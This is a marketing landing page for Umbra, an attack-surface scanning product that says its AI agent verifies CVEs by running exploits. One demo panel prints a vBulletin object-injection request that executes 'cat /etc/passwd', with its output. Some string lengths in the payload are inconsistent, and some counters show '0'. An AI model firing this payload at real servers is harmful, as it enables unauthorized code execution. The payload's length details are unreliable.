Umbra
Attack-surface intelligence

See every exposed service.
Prove what's exploitable.

Continuous discovery, AI-verified exploitation, and analyst-grade reports. Stop triaging thousands of CVE maybes. See the handful that are real.

Self-serve · cancel anytime · DPA available

Discovery
0/s
ports scanned per second per agent
Verification
$0–$2
typical AI cost per confirmed exploit
Time to PoC
0s
median for a verified critical CVE
app.umbrascope.com · /findings/run-48
Run #48 · 2026-05-24
Compromised

vBulletin 5.6.0: Pre-auth RCE

203.0.113.42:8080 · forum-staging.acme.io

Summary

CVE-2023-25135 confirmed exploitable via the ajax/api/hook/decodeArguments endpoint. Agent obtained code execution as www-data; recovered /etc/passwd in 73 seconds. Service should be patched or de-listed before next scan window.

Proof of concept
73.2s · $1.42
POST /ajax/api/hook/decodeArguments HTTP/1.1
Host: forum-staging.acme.io:8080
Content-Type: application/x-www-form-urlencoded

arguments=O:12:"vB_dB_Result":2:{s:5:"db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"recordset";s:8:"id; cat /etc/passwd";}

HTTP/1.1 200 OK
uid=33(www-data) gid=33(www-data) groups=33(www-data)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Fix Upgrade vBulletin to 5.7.5 or patch 5.6.x to 5.6.9 PL1.
Built by operators

Built by someone who's
been on the other side.

Umbra is built by Hussein Daher, a security researcher with 2,000+ confirmed vulnerability findings across the security programs of 1,000+ companies, including dozens of Fortune 500. The product exists because the tools available weren't operator-grade enough for the work.

0+
verified vulnerabilities reported
0+
companies' security programs
dozens
Fortune 500 brands among them
Apple
Google
Tesla
PayPal
Spotify
Coinbase
Goldman Sachs
Cloudflare
Shopify
AT&T
SpaceX
PlayStation
Dell
Snapchat
Airbnb
Uber
Dropbox
Atlassian
HubSpot
Pinterest
Netflix
Volkswagen
Wells Fargo
Square

1,000+ companies got the call from us first, not from the attackers.

1,000+ programs · 2,000+ findings · verified on bugcrowd.com/hussein98d and hackerone.com/hussein98d

New · headline release

Run an internal pentest.
One click.

Pick an installed agent, pick a safety tier. Umbra iterates every live service the agent has discovered and fans out a whole catalog of techniques as parallel AI exploit runs: SMB, SNMP, LDAP, Kerberos, ADCS, SSH, RDP, databases, web. One rollup view, every finding tagged by the technique that produced it.

Safe tier · enumeration-only · zero account-lockout risk · runs against the agent you already installed

AWS · Google Cloud · Azure

Find what's exposed in your cloud.
Then get the exact fix.

Connect an account read-only and Umbra scans the control plane for the exposure a port scan can't see (world-readable data, identities that can escalate to admin, secrets in config, internet-open services), then chains them into attack paths that terminate at your data. Public storage is proven with an anonymous read, and every finding ships with the exact command that removes it.

Read-only · least-privilege role · credentials encrypted at rest · the same workspace as the rest of your attack surface

On-demand · web application audit

Audit a web app end to end.
One PoC per finding.

Point Deep Audit at a target and it runs the whole pipeline: JupiterSec static DAST and the Vespasian browser crawl map every route, form, and parameter, then an AI Triager, Explorer, and Validator work the surface and confirm what's real: IDOR, OAuth bypass, business logic, the classes scanners miss. Each finding ships as a one-page proof: the request, the response, the line that proves the chain. Available on Starter and up.

Metered separately from the monthly subscription · available on Starter and up · one page of proof per confirmed finding

Why we exist

Your attack surface is bigger than you think. Most tools react with noise.

Hosts you forgot. Services that came up when nobody was looking. Certificates expiring on infrastructure that left the inventory three years ago. Vulnerability tools answer with thousands of maybes. Umbra answers with proof.

Most attack-surface tools
  • Match CVEs by version-string. Drown you in maybes.
  • Snapshot on a schedule. Miss what came up last Tuesday.
  • Skip RFC1918 entirely. Your internal network is a blind spot.
  • Report PDFs. Reproducing the finding is your problem.
Umbra
  • AI-verified exploits. Every critical finding comes with a working PoC.
  • Continuous, not periodic. Discovery scheduler tracks surface drift in hours.
  • Internal agent included. RFC1918 services land in the same dashboard, fingerprinted identically.
  • Replay every finding. Share a password-gated link; recipients reproduce without an Umbra account.
01 · Discovery

Find every exposed service.
Including what you forgot.

Continuous RustScan-driven port scanning across IPs, CIDRs, and hostnames (with full HTTP+TLS deep probe, favicon hashing, and non-HTTP banner grab on every open port). Internal networks too: drop the 5 MB agent on a bastion, RFC1918 services land in the same dashboard.

40k
ports in seconds, per RustScan run
256K
body bytes captured per service
4
platforms: linux ×2, mac, windows

Discovery is always free · pay only for assets you monitor

app.umbrascope.com · /hosts
3,658
Hosts
83
ASNs
12
Cloud accounts
New this week
+147
  • 203.0.113.91
    api-dev.acme.io
    AS24940 Hetzner
    2h ago
  • 198.51.100.4
    vpn-old.acme.io
    AS16509 AWS
    11h ago
  • 192.0.2.221
    (no rDNS)
    AS396982 GCP
    1d ago
  • 203.0.113.42
    forum-staging.acme.io
    AS24940 Hetzner
    2d ago
app.umbrascope.com · /services?detail=88421
Service · forum-staging.acme.io

203.0.113.42:8080

tcp · open

vBulletin 5.6.0 · PHP 7.4.33, nginx 1.18.0

Matched CVEs · 3
Critical CVE-2023-25135 High CVE-2021-44529 High CVE-2020-12695

$0.30–$2.00 typical · charged on confirmed exploitation only

02 · Verification

Don't guess at exploitability.
Prove it, in 73 seconds.

Click Verify on any critical CVE. An Anthropic-backed AI agent reads public PoCs, builds a hypothesis, runs non-destructive test requests, and writes a one-page proof: the exact request, the exact response, the exact line that proves the chain. Internal services too, relayed through your installed agent.

3
verdicts: exploitable, not, inconclusive
$1.42
median cost per critical-CVE run
100%
non-destructive · read-only · no auth abuse

Metered in dollars, not credits · ceilings before every run

Workflow · new

Run a remediation program.
Not just a scanner.

Findings are stateful, not snapshots. Assign them, set due dates, ship status both ways with Jira / GitHub, watch the weekly fix-rate climb. The executive dashboard floats the work that matters above the noise; the executive report rolls it up for the board.

Powered by Lumi, Umbra's AI security analyst: ranks your queue, explains every finding, in plain language

03 · Reports

Hand this to your CISO.
Or your client.

Every finding ships analyst-ready: severity, evidence, remediation, links to the replay. Three audiences, three reports off the same source of truth: per-target engagement report, multilingual per-run management summary, and the org-level executive risk report for the board.

3
report types: engagement, management, executive
6
languages (en, es, fr, de, pt, ar)
100%
findings linked to a reproducible PoC

PDF · Markdown · per-target · per-company · board-ready

app.umbrascope.com · /findings?engagement=acme-q2-2026
Engagement report · acme-q2-2026

Acme Industries: External attack surface

Summary

3 critical findings across 2 services; all AI-verified between 2026-05-22 and 2026-05-24. Recommend immediate action on the forum-staging RCE and certificate rotation on the legacy mail relay.

3 critical 7 high 12 medium · $4.18 spent on verification
Finding · 1 of 22

Pre-auth RCE on vBulletin 5.6.0

Affected URL
http://forum-staging.acme.io:8080/ajax/api/hook/decodeArguments
Analyst note
Exposed staging instance of the production forum. PHP object injection via the `arguments` parameter; agent confirmed execution as www-data and recovered /etc/passwd.
Recommendation
Upgrade to 5.7.5 or apply the 5.6.9 PL1 patch. De-list staging from public DNS while patching.
Governance · access · compliance

Roll it out to the whole team.
On your terms.

Four org roles, per-user module access, a full audit trail, and the evidence packs an auditor asks for: the controls a larger team wants before a security tool goes org-wide.

How it works

Signup to first verified CVE,
in under 5 minutes.

  1. Step 01
    Paste targets, discovery starts.

    Single IPs, CIDRs, hostnames: paste up to 10,000 at once. RustScan probes the surface in seconds.

    ~30 seconds
  2. Step 02
    Fingerprint, match CVEs, rank by real risk.

    Every service gets product + version + CPE. CVEs are matched against the full NVD corpus and gated by version, so patched builds stay quiet. KEV + EPSS surface what to fix first.

    ~2 minutes
  3. Step 03
    AI runs the exploit. PoC included.

    Click Verify on any critical CVE. The AI agent confirms exploitability and writes the one-page proof.

    ~73 seconds
0
shipped features
documented at /features
0MB
internal agent binary
4 platforms · sha256 + ed25519 signed
<1s
natural-language → query
"critical kevs on internal apache"
0%
findings have a real PoC
no "potentially vulnerable" entries
Pricing

Starts free. Scales with the surface.

Discovery is always free. Pay only when you start verifying.

Free
$0
10 assets · discovery + CVE matching
Starter
$99 /mo
100 assets · Deep Audit · AI validation · notifications
Pro
$499 /mo
1,000 assets · cloud · SSO · granular access
Business
$1,999 /mo
10,000 assets · internal pentest · compliance packs
Trust

We take our own security seriously.

Five minutes to your first verified CVE

Find what's exposed.
Prove what's exploitable.

Start with 10 assets, free, forever. No credit card. No sales call. Discovery starts within seconds of signup.